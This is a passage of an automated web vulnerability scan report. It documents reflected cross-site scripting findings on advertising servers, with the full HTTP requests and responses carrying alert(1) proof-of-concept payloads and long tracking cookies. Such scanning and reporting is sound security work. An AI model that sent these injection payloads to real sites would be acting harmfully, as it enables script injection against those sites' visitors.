Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049ei00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cbf00k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cbf00k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3b01v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34k00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2901x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:20 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 830

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&fdefb"-alert(1)-"6a122e04d38=1";
</script>
...[SNIP]...

3.47. http://ad.media6degrees.com/adserv/cs [tId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The value of the tId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37aa2"-alert(1)-"5ae84f10ba7 was submitted in the tId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserv/cs?tId=4071663510365101|cb=1297647330|adType=iframe|cId=3210|ec=1|spId=27355|advId=971|exId=19|price=0.3381000030040741|pubId=562|secId=194|invId=3099|notifyServer=asd147.sd.pl.pvt|notifyPort=8080|bid=1.61|srcUrlEnc=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://i.dailymail.co.uk/adTest/mpu-dm.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt12707lxzt12707lxzt12707lxzt12707l; vstcnt=3lebnns051l064e206123s185k81848g1848f1848e1848d1848c1848b1848a18488184871848618485184841848218481184801847z1847y1847x1847v1847u1847t1847s1847r1847q1847p1847o1847k1847i1847h1847g1847f1847e1847d1847c1847b1847a18479184781847418472184711846v1846u1846t1846s1846r1846q1846p1846o1846l1846k1846j1846i1846b1846a18469184621845y1845x1845w1845v1845t1845s1845r1845q1845p1845o1845n1845m1845k1845j1845i1845h1845g1845f1845e1845d1845c1845b1845a1845818457184561845518454184531844z1844y1844w1844v1844u1844t1844s1844r1844q1844p1844n1844m1844l1844k1844j1844h1844g1844f1844e1844d1844c1844a1843w1843v1843u1843t1843s1843r1843p1843o1843n1843m1843k1843j1843h1843g1843f1843d1843c184371843518434184301842z1842y1842x1842u1842t181qq4qbzj120a1yfnu1yfnt1yfnq1yfnp1yfno1yfnn1yfnm1yfnl1yfi41yfhj4e2p3120t237p8237p7237p6237p4237ou237os237oq237op237oo237on237om237ol237oi237oh237og237of237oe237oc237ob237o6237o5237o4237o3237o2237o1237o0237ny237nv237nu4fhux122m0d1tf0d1te0d1tc0d1tb0d1ta0d1t90d1t80d1t70d1t50d1t40d1t30d1t20d1t00d1sz0d1su0d1st0d1ss0d1sr0d1sq0d1so0d1sn0d1sm0d1sk0d1sj0d1si0d1se0d1sd0d1sc0d1s70d1s40d1s20d1s10d1s00d1rw0d1ru0d1rt0d1rs0d1rr0d1rq0d1rp0d1ro0d1rm0d1rl0d1rk0d1rj0d1rh0d1rg0d1rf0d1rd0d1rc0d1rb0d1r90d1r80d1r70d1r60d1r40d1r30d1r20d1r10d1r00d1qz0d1qx0d1qw0d1qv0d1qu0d1qo0d1qm0d1ql0d1qj0d1qi0d1qh0d1qg0d1qe0d1qc0d1qb0d1qa0d1q60d1q50d1q40d1q20d1q10d1py0d1px0d1pw0d1pv0d1pu0d1ps0d1pr0d1pq0d1pm0d1pl0axzm00000000004esx7120104tej49wpz120r1w3r41w3r01w3qz1w3qy1w3qx1w3qv1w3qu1w3qr1w3qq1w3qo1w3qm1w3ql1w3qi1w3qh1w3qg1w3qf1w3qe1w3qb1w3qa1w3q91w3q81w3q71w3q61w3q41w3q31w3pz1w3py0r073ik5120o0pk2n0kh4b0kh4a0kh490kh430kh3z0kh3y0kh3x0kh3v0kh3u0kh3t0kh3s0kh3r0kh3p0kh3m0kh3l0kh3j0kh3h0kh3g0kh3f0kh3d0kh3a0kh390keqa4nssk122m1c4wn1bw5j1bw5i1bw5g1bw5f1bw5e1bw5d1bw5b1bw5a1bw591bw561bw551bw541bw531bw521bw511bw501bw4z1bw4y1bw4x1bw4w1bw4u1bw4t1bw4s1bw4r1bw4q1bw4p1bw4o1bw4n1bw4l1bw4j1bw4i1bw4h1bw4g1bw4f1bw4e1bw4c1bw4b1bw4a1bw491bw481bw471bw461bw451bw441bw431bw421bw401bw3z1bw3x1bw3w1bw3v1bw3u1bw3t1bw3s1bw3r1bw3q1bw3p1bw3n1bw3m1bw3l1bw3k1bw3f1bw3e1bw3c1bw3b1bw3a1bw381bw361bw351bw341bw331bw321bw311bw301bw2z1bw2w1bw2v1bw2u1bw2t1bw2s1bw2r1bw2q1bw2p1bw2o1bw2n1bw2m1bw2l1bw2k1bw2j1bw2i1bw2c1bw2b1boph4u0e31202259612595p32te12021xgde1xg0o38c912012707l4jaec12021udrn1ucve3sti120326v3926uvg26uuv0s018raevpblc12011xh931p028VgwGdHhN1101254098BreszClF110v254102540z2540y2540x2540w2540u2540t2540s2540r2540q2540p2540n2540m2540l2540h2540g2540f2540d2540c2540b2540a254062540525404254032540225401253zz253zy253zx253yz1o018EstvP2qn112s1oa941oa931oa921oa911oa8z1oa8v1oa8u1oa8t1oa8s1oa8q1oa8p1oa8o1oa8n1oa8m1oa8l1oa8j1oa8i1oa8h1oa8g1oa8f1oa8e1oa8d1oa8c1oa8b1oa891oa881oa871oa841oa831oa821oa811oa801oa7y1oa7x1oa7w1oa7v1oa7u1oa7t1oa7s1oa7o1oa7n1oa7l1oa7k1oa7j1oa7i1oa7h1oa7g1oa7f1oa7e1oa7d1oa7b1oa7a1oa791oa781oa771oa761oa751oa741oa731oa721oa701oa6z1oa6y1oa6x1oa6w1oa6v1oa6u1oa6t1oa6o1oa6n1oa6m1oa6l1oa6k1oa6j1oa6h1oa6g1oa6f1oa6e1oa691oa681oa651oa641oa631oa611oa601oa5z1oa5y1oa5w1oa5v1oa5t1oa5s1oa5r1oa5q1oa5m1oa5l1oa5k1oa5j1oa5i1oa5h1o9ct; adh="1lf17qo16033e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; clid=2lebnns011706ch47d7o8wtv274ys01x1709070v214; orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; rdrlst=4330ojdlggtq20000000b170911gvlggtq20000000b17090yujlginvd0000000817080jv3lginvd0000000817080e0flggrmr0000000c17090x1blebnns1wj3q01411000yielginvd0000000817080yiflginvd0000000817080oj6lggtq20000000b17090e08lggtq20000000b170910qflginvq0000000717070e0nlgevbm0000000e17090w3clebnns1wj3q01411000jv6lebnns1wj3q01411000jv5lggtq20000000b17090j4ilew2e20000001r17090khalggtq20000000b17091196lfzx0l0000001417091195lg7rdq0000000v17090jillebnns1wj3q01411001194lg3y5y0000001117090z14lggtq20000000b17090zgdlggtq20000000b17090faalggtq20000000b17090z13lgio080000000217021193lgiiin0000000917091192lg5l2h0000001017090jprlginvd0000000817080w2klggtq20000000b17090yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001t17090mmnlebnns1wj3q01411000xwhlggtq20000000b17091004lginvd0000000817080z02lggtq20000000b17090kbzlggtq20000000b17090eh5lf17qf0000001p17090kkclggtq20000000b170906bylemlne0000001v17090df5lgcqt50000000j1709111xlggtq20000000b17090mn2lginvd0000000817080mn1lginvd0000000817080swvlggtq20000000b1709100plggtq20000000b17090im3lgcqt50000000j17090yzglginxj0000000517050b6mlf17qk0000001o17090y63lg93og0000000o17090xvslebnns1wj3q01411000o5alggtq20000000b17090yyxlginvu0000000617060yywlginzk0000000317030x1jlebnns1wj3q01411000xwclginvd0000000817080o4plginvd0000000817080yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000b17090yyelginyj0000000417040fullf8gij0000001l170910f6lg1nei00000013170900c9lfk1rn0000001i17090y7blg94wv0000000m17090jsalggtq20000000b170906pklginvd0000000817080cajlfk1rn0000001i17090p7vlebnns1xgc001b120010tylg60ji0000000w170910ellg1nei07gla00h120010eklggtq20000000b17090xuklebnns2219101x170911k3lginvd00000008170810telg60j60000000y170910e9lg1nei0000001317090xtblggtq20000000b170910e2lggtq20000000b17090mivlgismk0000000117010yw4lggtq20000000b170910e4lginvd00000008170810e5lg1nei00000013170910rdlg1vir087mk01217090xt3lggtq20000000b17090mzklgcsh70000000h17090agalggtq20000000b17090agblggtq20000000b17090mzqlgcsgy0000000i17090loxlginvd00000008170807gmlebnns1wj3q01411000kfalginvd0000000817080xthlebnns1xgc001b12000xtflggtq20000000b17090za2lginvd0000000817080za1lginvd00000008170807gqlggtq20000000b17090ovwlginvd0000000817080lw4lginvd0000000817080fuqlegh2b0000001w17090lw3lggtq20000000b17090l24lginvd0000000817080mz1lebnns1wj3q01411000l25lggtq20000000b170907vglfk1rn0tn5601i17090jk7lebnns1wj3q01411000cbnlfk1rn0tn5601i17090e11lggwth0000000a1709; sglst=21k0s8dtlggrmr01w8m00c1709070c20c8kmlggrmr01w8m00c1709070c20cavtlggrmr0056q00c1709070c20c82hlebnns1ucve00z10000600200avjlggrmr01w8m00c1709070c20c3kilggrmr01w8m00c1709070c20calhlggrmr01w8m00c1709070c20c9bslggrmr01w8m00c1709070c20cab4lebnns2707l01x1709070v21481zlggrmr0056q00c1709070c20c8gxlggrmr0056q00c1709070c20c81ylginvd00000008170807082088gwlginvd0000000817080708208aoklggrmr0056q00c1709070c20caollginvd0000000817080708208b07lggwth01r1w00a1709070a20a7inlginvd00000008170807082088nclginvd0000000817080708208b05lggrmr01w8m00c1709070c20cal1lggrmr01w8m00c1709070c20cbbhlggrmr01w8m00c1709070c20c8wylginvd0000000817080708208b0clfjpei0yygv01j1709070v2148wxlggrmr0056q00c1709070c20c72slggtq201ywi00b1709070b20bahhlginvd00000008170807082088nblggrmr0056q00c1709070c20cahilggrmr0056q00c1709070c20c7gdlgcqt5061tf00j1709070j20jb08lfjpei0yygv01b1700070020040ulggrmr01w8m00c1709070c20caprlggrmr01w8m00c1709070c20c5l4lgcqt5061tf00j1709070j20jaanlebnns1xg0o00o120007002008aelggrmr0056q00c1709070c20c61hlggrmr01w8m00c1709070c20c5b0lf17qo0000001n1709070v214ag2leqh191sblb01u1709070v2143thlggrmr01w8m00c1709070c20c8c9lggrmr0056q00c1709070c20c9z4lggrmr01w8m00c1709070c20cacjlggrmr01w8m00c1709070c20cb1alfjpei0yygv01j1709070v2149mmlggrmr0056q00c1709070c20cb0nlggrmr01w8m00c1709070c20cb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00c1709070c20c0tllegh2b22bk901w1709070v2149cblggrmr0056q00c1709070c20c8bglginvd00000008170807082084wmlggrmr01w8m00c1709070c20c5q8lebnns1ucve00k10000600200acelggrmr01w8m00c1709070c20c45mlfdxmc0000001k1709070v214bhdlginvd0000000817080708208

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16043w0t012e301OdygJLiOt01jvdp3e7s0103901WEF/RAmuh01bly126030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv29fgl01y18010801215; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: orblb=2lfk1rn042ct10u010wryf26x10u010tn5625810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: rdrlst=43311gvlggtq20000000c18010ojdlggtq20000000c18010yujlginvd0000000918010x1blebnns1wj3q01411000e0flggrmr0000000d18010jv3lginvd0000000918010yielginvd0000000918010yiflginvd0000000918010oj6lggtq20000000c18010e08lggtq20000000c180110qflginvq0000000818010w3clebnns1wj3q01411000e0nlgevbm0000000f18010jv6lebnns1wj3q01411000jv5lggtq20000000c18010j4ilew2e20000001s18010khalggtq20000000c18011196lfzx0l0000001518011195lg7rdq0000000w18010jillebnns1wj3q01411001194lg3y5y0000001218010z14lggtq20000000c18010zgdlggtq20000000c18010faalggtq20000000c18010z13lgio080000000318011193lgiiin0000000a18011192lg5l2h0000001118010jprlginvd0000000918010w2klggtq20000000c18010yh0lebnns1wj3q01411000jwblfk1rn0o4zv00p110007dpletz4d0000001u18010mmnlebnns1wj3q01411000xwhlggtq20000000c18011004lginvd0000000918010z02lggtq20000000c18010kbzlggtq20000000c18010kkclggtq20000000c18010eh5lf17qf0000001q180106bylemlne0000001w18010df5lgcqt50000000k1801111xlggtq20000000c18010mn2lginvd0000000918010mn1lginvd0000000918010swvlggtq20000000c1801100plggtq20000000c18010im3lgcqt50000000k18010yzglginxj0000000618010b6mlf17qk0000001p18010y63lg93og0000000p18010xvslebnns1wj3q01411000o5alggtq20000000c18010yyxlginvu0000000718010yywlginzk0000000418010x1jlebnns1wj3q01411000xwclginvd0000000918010o4plginvd0000000918010yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q01411000o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000hw7lggtq20000000c18010yyelginyj0000000518010fullf8gij0000001m180110f6lg1nei00000014180100c9lfk1rn0000001j18010y7blg94wv0000000n18010jsalggtq20000000c180106pklginvd0000000918010cajlfk1rn0000001j18010p7vlebnns1xgc001b120010tylg60ji0000000x180110ellg1nei07gla00h120010eklggtq20000000c18010xuklebnns2219101y180111k3lginvd00000009180110telg60j60000000z180110e9lg1nei0000001418010xtblggtq20000000c180110e2lggtq20000000c18010mivlgismk0000000218010yw4lggtq20000000c180110e4lginvd00000009180110e5lg1nei00000014180110rdlg1vir087mk01318010xt3lggtq20000000c18010mzklgcsh70000000i18010agalggtq20000000c18010agblggtq20000000c18010mzqlgcsgy0000000j18010loxlginvd00000009180107gmlebnns1wj3q01411000kfalginvd0000000918010xthlebnns1xgc001b12000xtflggtq20000000c18010za2lginvd0000000918010za1lginvd0000000918010ovwlginvd00000009180107gqlggtq20000000c18010lw4lginvd0000000918010fuqlegh2b0000001x18010lw3lggtq20000000c18010mz1lebnns1wj3q01411000l24lginvd0000000918010l25lggtq20000000c180107vglfk1rn0tn5601j18010jk7lebnns1wj3q01411000cbnlfk1rn0tn5601j18010e11lggwth0000000b1801; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Set-Cookie: sglst=21l0s8dtlggrmr01w8m00d1801080120d8kmlggrmr01w8m00d1801080120davtlggrmr0056q00d1801080120d82hlebnns1ucve00z10000600200avjlggrmr01w8m00d1801080120d3kilggrmr01w8m00d1801080120dalhlggrmr01w8m00d1801080120d9bslggrmr01w8m00d1801080120dab4lebnns2707l01y1801080121581zlggrmr0056q00d1801080120d8gxlggrmr0056q00d1801080120d81ylginvd00000009180108012098gwlginvd0000000918010801209aoklggrmr0056q00d1801080120daollginvd0000000918010801209b07lggwth01r1w00b1801080120b8nclginvd00000009180108012097inlginvd0000000918010801209b05lggrmr01w8m00d1801080120dal1lggrmr01w8m00d1801080120d8wylginvd0000000918010801209bbhlggrmr01w8m00d1801080120d8wxlggrmr0056q00d1801080120db0clfjpei0yygv01k1801080121572slggtq2049eb00c1801080120cahhlginvd00000009180108012098nblggrmr0056q00d1801080120dahilggrmr0056q00d1801080120d7gdlgcqt508cb800k1801080120kb08lfjpei0yygv01b1700070020040ulggrmr01w8m00d1801080120daprlggrmr01w8m00d1801080120d5l4lgcqt508cb800k1801080120kaanlebnns1xg0o00o120007002008aelggrmr0056q00d1801080120d61hlggrmr01w8m00d1801080120d5b0lf17qo0000001o18010801215ag2leqh191um3401v180108012153thlggrmr01w8m00d1801080120d8c9lggrmr0056q00d1801080120d9z4lggrmr01w8m00d1801080120dacjlggrmr01w8m00d1801080120db1alfjpei0yygv01k180108012159mmlggrmr0056q00d1801080120db0nlggrmr01w8m00d1801080120db0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200802lggrmr01w8m00d1801080120d4zqlgl34d00000001180108012019cblggrmr0056q00d1801080120d0tllegh2b24m2201x180108012155q8lebnns1ucve00k100006002004wmlggrmr01w8m00d1801080120d8bglginvd0000000918010801209acelggrmr01w8m00d1801080120d45mlfdxmc0000001l18010801215bhdlginvd0000000918010801209; Domain=media6degrees.com; Expires=Sat, 13-Aug-2011 01:36:13 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 14 Feb 2011 01:36:12 GMT
Content-Length: 827

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Media6/B3897970.7;sz=300x250;click0=http://ad.media6degrees.com/adserv/clk?tId=4071663510365101|cId=3210|cb=1297647330|notifyPort=8080|exId=19|tId=4071
...[SNIP]...
3br.net?anId=40&pubId=3099&advId=27355&campId=2946&vURL=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html37aa2"-alert(1)-"5ae84f10ba7";
</script>
...[SNIP]...

3.48. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3c3"><script>alert(1)</script>10dcb1064b2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4f3c3"><script>alert(1)</script>10dcb1064b2 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=4thKjbT4Dd-wLmJ_EvL6OGUx_YihuVVYu3_TfrxVOxLfaqaDzVRu9ZiuBStYaftYPFbUXCL2UgT2Zh2i9n4bdmEFJK3PW8OZmgDnNcPWCfNI4E_LJGBd5ktc9D2EP3iXVzloyRtYmz5WwUlOqhgjJzRf6EtvPvPDy4qyJ60plhIiUcxVMkOk7W6GdnfN9Orwi4ny57OJZgTzL2FsqZrAh5fiWQZAKAOwRHx78cjQB8i-ExJ7_A4Q_x0WiDS5R8s4qPZYQ2rQpBVvfWWYpFe6URy2Vs2VdJ_TjWWvjLV9Q8m6hMviS8YTqb-ZiVtIUBjDzfzTwFruRQFMbT_NyCr5tmotZSQRzCZw0LF6c45BQQz09oHzZ-yryLJ8uFUm4TqTtHFDougM6qn-fCnFGGL4NPUNvmQnKSR_IW4vjpinnmSpjj2_u47YbamQM73IHCy9Sl0ZpaTYKgObLd08Gd0JoGuaLLHRZ-Ykz_TkIVZ9huoJ8VG9LN1TNKQM_NPsV2xeGHi3bYbGKGUdjPIU0cMPnGmxPU3XXT2arCgoL6Dn4SMbxfNR_y_fM9tMo0Ph6oeDvYYKlkyzNn3JdfPZgqqaIviA5QdTAVKvxsbfG_RiFigTLmpyQcn5PksmVWqu3SbN0VyR3eDASlHpj1bavPEOnrozydlNm_TE_r6icluVhvQE5Ov43rl2rHjKBgmJieXzPjWJq1kMte659Vcd5HhCaUJMqEVW9CddSG3ugiIvGpPb38PDFUA8hG6SKkVM5AiGw80gZu3yl7Vvk0bmhH4LCjjLMwDmJjRrWXjcO5EGZgy-ExJ7_A4Q_x0WiDS5R8s4BTpYXsHIzHlWqOeElAAexRy2Vs2VdJ_TjWWvjLV9Q8nWiYtrtggzf6QC_emGCUYHkAYZWo2P43mtp_vZfpxwURmMklWmLOsCWcBHbWrEHfnZfxRZofW-YLqIXc_XLzmrtHFDougM6qn-fCnFGGL4NAnCoYY7ACuNqpuJuqlD4PrpKdIl-vCs8PYIscXyY2wFHIA3ClafPQTXMYm0ZGX1lQ868DsJ8CzRL-qFZYXXGjnjVL9jGjuvVIAupi7jFNwmxmjWmZmvAOPnNuXsYJKsZcpAzSHYH88Cmpasf_VURFf22rMJNM9ndqYziU5Lic-QRj7a56PoySegU7HYB2c8HfiA5QdTAVKvxsbfG_RiFigezlWM8YZNRG9XfqIkin8k0VyR3eDASlHpj1bavPEOntPhusJqVFauiLy6UaFFc3PYmsvrCy4wt-d-LduEaGqhUO6VPDt67tRjGh2NpKtfx8Q-S6gpZovZHf4-kC6dIE7b38PDFUA8hG6SKkVM5AiG7G4qQXY8m01JE-wQyevARsbLIt6lxw4qn7zj9tJ2fQGJD8GhxX6KZrz-6lFiGJ-dRv8YUVgIig-grRaq4S8oT-Q_b1qUvkrI7hhBR8IjByfmHTKIVgzw0wJBikXj03WpHLZWzZV0n9ONZa-MtX1DyZl0YUseit0Cb3G_gMYpmfL9wJ-3B_7kL8dMqUjPBdPRS-kP3YQEvr7AqH2rw9rktoXdbV9sNJrU4cvKljWSeO20cUOi6Azqqf58KcUYYvg0eCIP4EeWu1tLqPD3KXyux9cg7-TCOBWwPvbOtAvH7FGTa5jgFaEbBx4OAtVXexdyPlxg9BhJfaBCNSYQ5Kq_-Sjtcg1-30-9Ex6CEY-Yr1gzbPQ4BjJufC2fQIZLJhJjTiug9ME9M3D4Hl8Eiw362GgMO-O5Hy-7BFA0JHw__mPd1M64cIluMfueZjPGlcvizzBrSDsidMXjw5kLBtnZH3sxbrc1XjPazF6bacT5OH5OfL6S5Ch8nYybd10IPcQ93hujX2-lUqQOZRz7lhE-Mp13Bx7SEoyCM4rv0PtWLZlDJuYINnvP4ltz0zwgi9RdBr-KLFRC4eQNwFThZDiSaEHYLoXdcf54MP-yW5BVHlvKRVBkBjUodw_dLB6IX2KDEvDFvZpoLKOIMM8vL4_UX54AJfo84MmNcJgucmF3a2rT3pH0CBj7HfwbEk4PHUhndSdvNmS_gGLRvueh6oi2M6aEMhx-btVOzA0hsRH2jLUVQcxEhmmaR_l3AS4SvhqrNqEcMkLIEPS56MjZCBdGPtsP2xTDqtDji7OeZPTeV4aXza8_gpDhhNfGv5kRzDqO8mTlK1zd_GN8J_C68v3vm6BzTfJiMvS8kl8QpS3DqrvGcnol-G-iOOCWmycV6dgRNwsJa0K7KBuioHn9OSA6OiovTKpiVvvksy9RWsNaBwlsK1sD2r9fBgo8cuHbz9o6Tiug9ME9M3D4Hl8Eiw362LLnvPdOAVRV_3-HFZurs-NwJI3B7sA3g7sDqxZPuDfgzzBrSDsidMXjw5kLBtnZH7oOoiCwaxJgx3v_OzDlP7JOfL6S5Ch8nYybd10IPcQ9X9Zc-e5Mnab9xws12uVaIR41EcKEDQON3vRYH1ZUr61GHZ56kCOvAMTmw-gDf-xHDkY3JWzdKEsukJ4BiXga1Q5GNyVs3ShLLpCeAYl4GtUORjclbN0oSy6QngGJeBrVn5kB8Bu8c7iHFAXgmGoiK5-ZAfAbvHO4hxQF4JhqIitAbIkJ3D687v0OZkfgvqhELnQlAE28n2DlyK7b-DFMmy50JQBNvJ9g5ciu2_gxTJuBUJX9pmSCLxiuzwYB86MTELbAFv_xsAvubJCJLlla0oa_uPyJAWAqD3ibcNxLhk9ZzfBU98RRGsiE7rLYAF7U0-lEpCQVO21AuaAn_6GWFjz7d-4JRCuozQQLfumpJSE1DAEFgyp5834TD56SR74-Gh_KZ4seqRyrSxDnYx6bbfvAdLEn8TgpYNDQOQBkNz_F4x9ydwRSyIlnBm5mjWTk2dsWUEe8YR0nRJ-RcjY4xKJY8_GDDsXZNc1xnOxIheEQaA4_4EDHKnfUnUEid2opeYGr2g6mjt8EkHand-oCrrsR_OIT6A1FqZldQLQBAfHRgcgF7FIdSZ5_87nT02pdOnckIzBPiMwCCKcMv-7LcniSJ_Z38uuHkYOliRcJOdbpoGbLCuvMNPg3cndaJwsK586AJWmQ44nwkhMoTIzPW2taqTWyyeGxhJe01tYYHhRwe50TGiQ4ayqZvxMwes0JcHudExokOGsqmb8TMHrNCYtqLln3rNkPy2fMYNItjb5p65N4NYIsxswLMnqfZzbqCZXHJ1GbJJRnbnm1mp0j6K931lLoYdbax2TZPhn7gigYHdiLIdqGJN4Fby-yTBP2ufYpAYQqKaBXZ3QHkktVEBQJcQBlsfrYmJhYACPhmlxrA0gThBUR_zElsqQPAsivSfXt6uuP7jvz9fgKyii_iYGj9voxAgcfPraiNme77-893dHG8TFoJbhrCrvd5u6DZXmYt3xjOemA4riPtg-VlcukHHk83m-gUQjwWqAerbhO6rTzKugJUqBqQ9F50l9JRxXHlVSYCTiFzrRayu0fCO6vLYbwbFb6diFeniXAnXYICxs_4rTchCin_F_gXJw3CAsbP-K03IQop_xf4FycNwgLGz_itNyEKKf8X-BcnDcICxs_4rTchCin_F_gXJw3SBYpq5h-OqNGCLdyjyYb4qyq4RHxj-sjEeXvEtPcPdY; fc=Q-i4UMc4QwIi-DRd9R6ia1J9_78D67FqFC0kV3tGd2QJJ7mWye14_2YpDYf2fGJzuDSye8dCcqjb55W88by2Y_lYn6WwWx8I_DeXmnM2x-jLDfaXqd7ordwJWxbMBXbCcEhYog6oHcMAxRPP4dyBk0paMt9KyzBYx_f8zOMt1_UkBxkTNTAXWm9kNSZlguLR5fjP49PUhu7v4L3sHsRyZQ; 